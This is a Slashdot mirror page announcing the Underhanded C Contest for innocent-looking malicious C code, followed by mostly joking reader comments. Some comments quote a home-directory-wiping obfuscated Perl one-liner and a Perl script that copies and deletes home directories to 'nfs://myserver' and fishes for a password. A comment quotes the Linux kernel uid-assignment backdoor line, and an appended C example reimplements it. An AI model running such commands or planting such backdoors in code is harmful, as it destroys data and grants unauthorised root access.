Slashdot Mirror


The First Annual Underhanded C Contest

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

9 of 341 comments

  1. Comment removed by account_deleted · · Score: 5, Funny

    Comment removed based on user account deletion

  2. like this? by LiquidCoooled · · Score: 5, Funny

    #include stuff.h
    void main()
    {
    /* nothing / */ /* to see / * here */
    /* whats * / challenging / * about */
    /* this */ /* there / is no */ evil /*
    screensaver(); * function */ /* here
    anyone that thinks there is * / needs */
    /* their / * / eyes testing */ ();
    }


    --
    liqbase :: faster than paper
  3. Here you go by titzandkunt · · Score: 5, Funny


    Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

    #define void int

    Hours & hours of irritation & confusion!

    T&K.

    --
    Political language ... is designed to make lies sound truthful and murder respectable...
  4. Re:What are the legal ramifications of this? by bighoov · · Score: 5, Funny

    Can you even breathe in that tinfoil cocoon?

  5. Re:Seems a bit like those hacking contests by numbski · · Score: 5, Informative
    This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'
    Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight", then it is far more dangerous. :)

    I mean I could do something like this:

    # When do you want it done?
    $today="sudo";
    $yesterday="su -c";

    # Define our globals
    $superman="ls";
    $wonderwoman="rm";
    $batman="cp";
    $aquaman="mv";

    #define some important flags
    $blows="-r";
    $maims="-p";
    $chunks="-f";
    $defeats="-s";

    #define some targets
    $your_mom="/";
    $your_dad="/usr";
    $your_sister="~";
    $your_teacher="/bin";
    $hell="/dev/null";
    $heaven="/dev/random";
    $skyhigh="nfs://myserver/myhome";

    #....later, back at Superfriends Headquarters

    `$batman $blows $your_sister $skyhigh`;
    `$wonderwoman $blows $chunks $on $your_sister`;
    `$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
    #Would you like to see the rest of the story?
    #print "Would you like to hear more? Please type your password to continue!";

    The superfriends save the day again.
    --

    Karma: Chameleon (mostly due to the fact that you come and go).

  6. Re:Why? by Nf1nk · · Score: 5, Insightful

    To find subtly malicious code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
    It is sort of like the computer version of a bomb squad.

    --
    I used to have a cool sig, back when I cared
  7. Subtlety by Dirtside · · Score: 5, Funny
    The prize is beer.
    ...but the beer is poisoned!
    --
    "Destroy science and religion. Science would re-emerge exactly the same; but not religion." - Penn Jillette, paraphrased
  8. how's this? by spongman · · Score: 5, Funny

    int main () { WinExec ("iexplore.exe"); }

  9. Linux Kernel Backdoor Attempt by Johnny+Hardcore · · Score: 5, Informative

    This reminds me about the attempt at inserting a backdoor in the Linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

    The attempt was trying to insert

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

    inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
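
The pattern described in the last comment, shown beside the comparison it imitates, as an added example (not part of the original thread and not kernel code). The `task` struct, the `OPT_*` flag names, the uid 1000 and the `ERR_INVAL` return value are constructed stand-ins.

```c
#include <stdio.h>

/* Hypothetical stand-ins for the kernel's __WCLONE/__WALL flags and the
   current task; ERR_INVAL is a constructed return value. */
#define OPT_WCLONE 0x80000000u
#define OPT_WALL   0x40000000u
#define ERR_INVAL  (-22)
struct task { unsigned uid; };

/* The line from the comment: reads like "reject this flag combination
   for root", but the second operand is an assignment. */
int check_backdoored(struct task *cur, unsigned options)
{
    if ((options == (OPT_WCLONE | OPT_WALL)) && (cur->uid = 0))
        return ERR_INVAL;  /* unreachable: the assignment evaluates to 0 */
    return 0;
}

/* The comparison it imitates. Taking a const pointer makes any write to
   cur->uid a compile error, so a '=' typo or plant cannot build. */
int check_intended(const struct task *cur, unsigned options)
{
    if ((options == (OPT_WCLONE | OPT_WALL)) && (cur->uid == 0))
        return ERR_INVAL;
    return 0;
}

/* Run each check as an unprivileged caller (constructed uid 1000) and
   return the uid the task holds afterwards. */
unsigned uid_after_backdoored(unsigned options)
{
    struct task t = { 1000 };
    check_backdoored(&t, options);
    return t.uid;
}

unsigned uid_after_intended(unsigned options)
{
    struct task t = { 1000 };
    check_intended(&t, options);
    return t.uid;
}

int main(void)
{
    printf("backdoored: uid %u\n", uid_after_backdoored(OPT_WCLONE | OPT_WALL));
    printf("intended:   uid %u\n", uid_after_intended(OPT_WCLONE | OPT_WALL));
    return 0;
}
```

Because `&&` short-circuits, the assignment only runs when the exact flag combination is passed, so ordinary callers never exercise it and behavioural testing is unlikely to notice.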